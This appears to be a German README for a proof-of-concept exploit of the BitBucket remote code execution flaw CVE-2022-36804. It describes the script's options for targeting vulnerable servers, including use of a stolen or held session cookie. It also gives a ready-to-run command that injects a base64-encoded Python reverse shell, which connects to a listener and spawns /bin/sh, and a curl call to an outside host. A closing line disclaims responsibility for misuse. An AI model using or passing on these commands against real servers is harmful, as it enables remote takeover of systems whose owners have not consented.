
Ein echter Exploit für BitBucket RCE CVE-2022-36804
Dieses Repository enthält einen einfachen Proof-of-Concept-Exploit für die kürzlich entdeckte BitBucket-Schwachstelle zur Codeausführung von entfernten Standorten (CVE-2022-36804). Für die Ausnutzung dieser Schwachstelle ist Zugriff auf ein Repository auf der Zielinstanz erforderlich. Wenn Sie keine Anmeldeinformationen haben, muss das Ziel über öffentliche Repositorien verfügen.
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
[--check]
Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)
optionale Argumente:
-h, --help zeigt diese Hilfemeldung an und beendet das Programm
-p PROJECT, --project PROJECT
Der Name des Projekts, in dem sich das öffentliche Repository befindet (z. B.
testproject)
-r REPO, --repo REPO Der Name des öffentlichen Repositorys (z. B. testrepo)
-u URL, --url URL Die URL des BitBucket-Servers (z. B. http://localhost:7990/)
-c COMMAND, --command COMMAND
Der auf dem Server auszuführende Befehl (z. B. 'curl http://canary.domain/')
--proxy PROXY HTTP-Proxy für das Debugging (z. B. http://localhost:8080/)
--session SESSION Der Wert Ihres 'BITBUCKETSESSIONID'-Cookies, erforderlich, falls Ihr Ziel-
Repository privat ist. (z. B. 3DD8B1EBA3763AD2611F4940BD870865)
--check Nur eine Prüfung durchführen, ob die Instanz anfällig ist
Um zu überprüfen, ob eine Instanz anfällig ist, können Sie den folgenden Befehl ausführen:
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check
Mit dem folgenden Befehl kann eine Reverse-Shell auf dem Ziel eingerichtet werden (das Base64-Payload muss mit den Details Ihres Listeners aktualisiert werden):
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d | bash |"
Dieser Exploit dient Bildungs-/Forschungszwecken; ich bin nicht verantwortlich dafür, wie er verwendet wird. Seid nett :)